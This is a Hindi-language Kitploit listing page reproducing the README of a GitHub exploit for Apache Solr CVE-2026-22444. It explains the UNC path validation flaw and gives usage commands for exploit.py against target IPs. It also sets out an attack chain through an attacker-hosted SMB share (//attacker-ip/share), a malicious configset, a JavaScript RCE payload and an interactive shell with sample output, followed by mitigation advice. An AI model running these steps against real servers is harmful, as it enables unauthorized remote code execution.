Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-22444 — Apache Solr CVE-2026-22444 के लिए एक्सप्लॉइट, जो UNC पाथ इंजेक्शन और SMB सर्वर का उपयोग करके दुर्भावनापूर्ण कॉन्फिगसेट और JavaScript पेलोड के माध्यम से रिमोट कोड एक्ज़ीक्यूशन प्राप्त करता है। | Kitploit
उपकरण/GitHubGitHub/bfdfhdsfdd-crypto/cve-2026-22444
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगरिमोट एक्सेस टूल
GitHubbfdfhdsfdd-crypto/cve-2026-22444

CVE-2026-22444

Apache Solr CVE-2026-22444 के लिए एक्सप्लॉइट, जो UNC पाथ इंजेक्शन और SMB सर्वर का उपयोग करके दुर्भावनापूर्ण कॉन्फिगसेट और JavaScript पेलोड के माध्यम से रिमोट कोड एक्ज़ीक्यूशन प्राप्त करता है।

रिपॉजिटरी देखें
547 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-22444

Apache Solr UNC पथ सत्यापन भेद्यता

अवलोकन

CVE-2026-22444 एक सुरक्षा भेद्यता है जो Apache Solr को प्रभावित करती है, जिसे लगभग 20 जनवरी 2026 को सार्वजनिक रूप से प्रकट किया गया था। यह भेद्यता Apache Solr के "create core" API में कुछ API मापदंडों पर अपर्याप्त इनपुट सत्यापन (CWE-20: Improper Input Validation) के कारण उत्पन्न होती है, जो हमलावर को Solr के "standalone" मोड में चलने पर सुरक्षा नियमों को बायपास करने की अनुमति देती है, जिससे डेटा रिसाव, रिमोट कोड निष्पादन (RCE) या NTLM हैश प्रकटीकरण हो सकता है।

विशेष रूप से, यदि Solr में प्रमाणीकरण सक्षम नहीं है या उपयोगकर्ता के पास कोर बनाने की अनुमति है, तो हमलावर सावधानीपूर्वक निर्मित अनुरोध के माध्यम से इस API का दुरुपयोग करके संरक्षित फ़ाइलों तक पहुंच सकता है या दुर्भावनापूर्ण कार्य कर सकता है।

प्रकटीकरण जानकारी

यह भेद्यता 2025 में खोजी गई और Apache को रिपोर्ट की गई, और oss-security मेलिंग सूची पर सार्वजनिक रूप से प्रकट की गई:

आधिकारिक घोषणा: https://www.openwall.com/lists/oss-security/2026/01/20/5

तकनीकी विवरण

यह भेद्यता CoreContainer.java में मौजूद है, जहां CoreDescriptor कंस्ट्रक्टर UNC पथ सत्यापन निष्पादित करने से पहले नेटवर्क संचालन ट्रिगर करता है:

  • instancePath.toAbsolutePath() नेटवर्क के माध्यम से UNC पथ को हल कर सकता है
  • Files.exists() जांच नेटवर्क कॉल निष्पादित करती है
  • Files.newInputStream() नेटवर्क रीड निष्पादित करता है
  • assertPathAllowed() के माध्यम से पथ सत्यापन केवल इन संचालनों के बाद होता है
  • समयरेखा

    • 2025-08-20: भेद्यता खोजी गई और Apache को रिपोर्ट की गई
    • 2026-01-20: सार्वजनिक प्रकटीकरण

    रिपॉजिटरी सामग्री

    • exploit.py - अवधारणा प्रमाण शोषण स्क्रिप्ट
    • files/ - शोषण के लिए आवश्यक सहायक फ़ाइलें (configset)
      • rce.js - रिमोट कोड निष्पादन JavaScript payload
      • conf/ - Solr कॉन्फ़िगरेशन फ़ाइलें
        • solrconfig.xml - दुर्भावनापूर्ण अपडेट प्रोसेसर श्रृंखला परिभाषित करता है
        • schema.xml - Solr schema परिभाषा
        • managed-schema - प्रबंधित schema फ़ाइल
    • requirements.txt - Python निर्भरताएं

    उपयोग निर्देश

    पर्यावरण आवश्यकताएं

    • Python 3.6+
    • लक्ष्य प्रणाली पर Apache Solr चल रहा हो (Windows प्रणाली, स्टैंडअलोन मोड)
    • लक्ष्य Solr में प्रमाणीकरण सक्षम नहीं है, या हमलावर के पास कोर बनाने की अनुमति है

    निर्भरताएं स्थापित करना

    root@kitploit:~
    pip install -r requirements.txt
    

    निर्भरताओं में शामिल हैं:

    • requests>=2.25.0 - HTTP अनुरोधों के लिए
    • impacket>=0.10.0 - SMB सर्वर बनाने के लिए

    मूल उपयोग

    1. मूल हमला (स्वचालित स्थानीय IP पहचान)

    root@kitploit:~
    python3 exploit.py <लक्ष्य IP>
    

    उदाहरण:

    root@kitploit:~
    python3 exploit.py 192.168.1.100
    

    2. Solr पोर्ट निर्दिष्ट करना

    root@kitploit:~
    python3 exploit.py <लक्ष्य IP> --port <पोर्ट>
    

    उदाहरण:

    root@kitploit:~
    python3 exploit.py 192.168.1.100 --port 8983
    

    3. SMB सर्वर कॉन्फ़िगरेशन निर्दिष्ट करना

    root@kitploit:~
    python3 exploit.py <लक्ष्य IP> --smb-host <SMB सर्वर IP> --smb-port <SMB पोर्ट>
    

    उदाहरण:

    root@kitploit:~
    python3 exploit.py 192.168.1.100 --smb-host 192.168.1.50 --smb-port 445
    

    4. कस्टम SMB शेयर नाम

    root@kitploit:~
    python3 exploit.py <लक्ष्य IP> --share-name <शेयर नाम>
    

    उदाहरण:

    root@kitploit:~
    python3 exploit.py 192.168.1.100 --share-name myshare
    

    कमांड लाइन तर्क विवरण

    root@kitploit:~
    स्थितीय तर्क:
      target_host           लक्ष्य Solr सर्वर IP पता
    
    वैकल्पिक तर्क:
      -h, --help            सहायता जानकारी दिखाएं और बाहर निकलें
      --port, -p PORT       Solr सर्वर पोर्ट (डिफ़ॉल्ट: 8983)
      --smb-host SMB_HOST   SMB सर्वर IP (डिफ़ॉल्ट: स्वचालित रूप से स्थानीय IP पहचानें)
      --smb-port SMB_PORT   SMB सर्वर पोर्ट (डिफ़ॉल्ट: 445)
      --share-name SHARE    SMB शेयर नाम (डिफ़ॉल्ट: malicious)
    

    हमला प्रक्रिया

    1. SMB सर्वर प्रारंभ करें: स्क्रिप्ट स्थानीय रूप से एक SMB सर्वर प्रारंभ करेगी, जो files निर्देशिका साझा करेगी
    2. दुर्भावनापूर्ण कोर बनाएं: लक्ष्य Solr को कोर निर्माण अनुरोध भेजें, जो SMB सर्वर पर दुर्भावनापूर्ण configset की ओर इंगित करता है
    3. Payload ट्रिगर करें: Solr SMB सर्वर से कॉन्फ़िगरेशन फ़ाइलें डाउनलोड करेगा, जिसमें दुर्भावनापूर्ण JavaScript कोड शामिल है
    4. कमांड निष्पादित करें: अपडेट अनुरोध भेजकर JavaScript payload निष्पादन ट्रिगर करें
    5. इंटरैक्टिव शेल: सफल शोषण के बाद, इंटरैक्टिव कमांड निष्पादन वातावरण में प्रवेश करें

    इंटरैक्टिव शेल उपयोग

    सफल शोषण के बाद, स्क्रिप्ट एक इंटरैक्टिव शेल प्रदान करेगी:

    root@kitploit:~
    solr> whoami
    [+] exit_code: 0, status: success
    --- stdout ---
    desktop-abc123\user
    
    solr> dir
    [+] exit_code: 0, status: success
    --- stdout ---
    Volume in drive C has no label.
    ...
    
    solr> exit
    [*] exiting shell...
    

    समर्थित कमांड:

    • कोई भी Windows CMD कमांड
    • exit या quit - इंटरैक्टिव शेल से बाहर निकलें
    • Ctrl+C - बाधित करें और बाहर निकलें

    कार्य सिद्धांत

    यह भेद्यता निम्नलिखित तकनीकी श्रृंखला का उपयोग करती है:

    1. UNC पथ इंजेक्शन: configSet पैरामीटर के माध्यम से UNC पथ इंजेक्ट करें (उदाहरण: //attacker-ip/share)
    2. SMB सर्वर: दुर्भावनापूर्ण Solr कॉन्फ़िगरेशन फ़ाइलें होस्ट करें
    3. JavaScript RCE: Solr के StatelessScriptUpdateProcessorFactory का उपयोग करके JavaScript कोड निष्पादित करें
    4. कमांड निष्पादन: Java Runtime API के माध्यम से लक्ष्य प्रणाली पर मनमाना कमांड निष्पादित करें

    उन्नत उपयोग उदाहरण

    पूर्ण पैरामीटर उदाहरण

    root@kitploit:~
    python3 exploit.py 192.168.35.31 \
      --port 8983 \
      --smb-host 192.168.35.50 \
      --smb-port 445 \
      --share-name exploit
    

    फ़ाइल संरचना विवरण

    root@kitploit:~
    CVE-2026-22444/
    ├── exploit.py              # मुख्य शोषण स्क्रिप्ट
    ├── requirements.txt        # Python निर्भरताएं
    ├── files/                  # दुर्भावनापूर्ण configset
    │   ├── rce.js             # RCE JavaScript payload
    │   └── conf/              # Solr कॉन्फ़िगरेशन निर्देशिका
    │       ├── solrconfig.xml # दुर्भावनापूर्ण अपडेट प्रोसेसर कॉन्फ़िगर करता है
    │       ├── schema.xml     # Schema परिभाषा
    │       └── managed-schema # प्रबंधित schema
    └── README.md              # यह फ़ाइल
    

    payload विवरण

    rce.js: यह मुख्य RCE payload है, जो:

    • Solr के अपडेट संचालन (add, delete, commit, rollback) को इंटरसेप्ट करता है
    • अनुरोध मापदंडों से cmd पैरामीटर प्राप्त करता है
    • Java Runtime API का उपयोग करके कमांड निष्पादित करता है
    • stdout और stderr कैप्चर करता है
    • निष्पादन परिणाम और निकास कोड लौटाता है

    solrconfig.xml: Solr को दुर्भावनापूर्ण अपडेट प्रोसेसर श्रृंखला का उपयोग करने के लिए कॉन्फ़िगर करता है:

    • rce-chain अपडेट प्रोसेसर श्रृंखला परिभाषित करता है
    • rce.js स्क्रिप्ट को संदर्भित करता है
    • /update अनुरोध प्रोसेसर को इस श्रृंखला का उपयोग करने के लिए सेट करता है

    सावधानियां

    ⚠️ चेतावनी: यह उपकरण केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए है। इस उपकरण का उपयोग करके प्रणालियों पर अनधिकृत हमला करना अवैध है।

    • उपयोग से पहले स्पष्ट लिखित प्राधिकरण प्राप्त करना सुनिश्चित करें
    • केवल परीक्षण वातावरण या कानूनी रूप से अधिकृत वातावरण में उपयोग करें
    • उत्पादन प्रणालियों पर उपयोग न करें, जब तक कि नियंत्रित पैठ परीक्षण वातावरण में न हो
    • उपयोगकर्ता अपने कार्यों के लिए स्वयं जिम्मेदार है

    सुरक्षा अनुशंसाएं

    1. Solr अपग्रेड करें: Apache Solr को उस संस्करण में अपग्रेड करें जिसमें यह भेद्यता ठीक हो गई है
    2. प्रमाणीकरण सक्षम करें: सुनिश्चित करें कि Solr में मजबूत प्रमाणीकरण तंत्र सक्षम है
    3. कोर निर्माण अनुमतियां सीमित करें: केवल विश्वसनीय उपयोगकर्ताओं को कोर बनाने की अनुमति दें
    4. नेटवर्क अलगाव: Solr को संरक्षित नेटवर्क वातावरण में तैनात करें
    5. फ़ायरवॉल नियम: Solr प्रशासन इंटरफ़ेस तक पहुंच सीमित करें
    6. असामान्य गतिविधि की निगरानी: UNC पथ पहुंच और असामान्य कोर निर्माण अनुरोधों की निगरानी करें

    संदर्भ लिंक

    • Apache Solr आधिकारिक वेबसाइट
    • OSS Security मेलिंग सूची घोषणा
    • CWE-20: Improper Input Validation

    लाइसेंस

    यह परियोजना MIT लाइसेंस का पालन करती है। विवरण के लिए LICENSE फ़ाइल देखें।

    अस्वीकरण

    यह उपकरण और जानकारी केवल सुरक्षा अनुसंधान और शैक्षिक उद्देश्यों के लिए है। लेखक इस जानकारी या उपकरण के दुरुपयोग से होने वाली किसी भी क्षति के लिए जिम्मेदार नहीं है। उपयोगकर्ताओं को सभी लागू कानूनों और विनियमों का पालन करना चाहिए और उपयोग से पहले उचित प्राधिकरण प्राप्त करना चाहिए।

    टूल डाउनलोड करें